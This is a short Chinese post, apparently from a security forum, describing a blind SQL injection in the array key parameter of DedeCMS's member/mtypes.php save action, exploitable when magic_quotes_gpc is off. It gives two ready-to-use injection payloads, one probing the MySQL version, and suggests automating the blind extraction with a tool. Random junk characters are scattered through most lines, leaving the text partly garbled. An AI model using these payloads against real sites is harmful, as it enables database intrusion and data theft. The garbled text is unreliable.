需要magic_quotes_gpc = Off,所以说是鸡肋啊.
5 C) B1 ?% e( R1 a) r3 K- ? M0 X; O8 T: p: r- ?' a, G
$ x" b2 v9 B2 Q4 a( N, E. c
发生在数组key里的注射漏洞,有点意思.+ N* t3 E6 C R
2 \. k$ t/ T. I& h
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下$ A: M1 b& G) c) s3 C
+ {# w5 s% C+ M+ q' p. P) ~http://www.xxx.com /dede/member/mtypes.php?dopost=save5 I7 y0 {% O" E" w7 Q7 j! g( U
& d4 S7 m1 K+ f4 z9 P8 ~0 s5 s
exploit:
, s5 ^& ?( @3 ~ tmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r# Z1 A v$ c* D
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
( D% r! g% e% q" C0 X |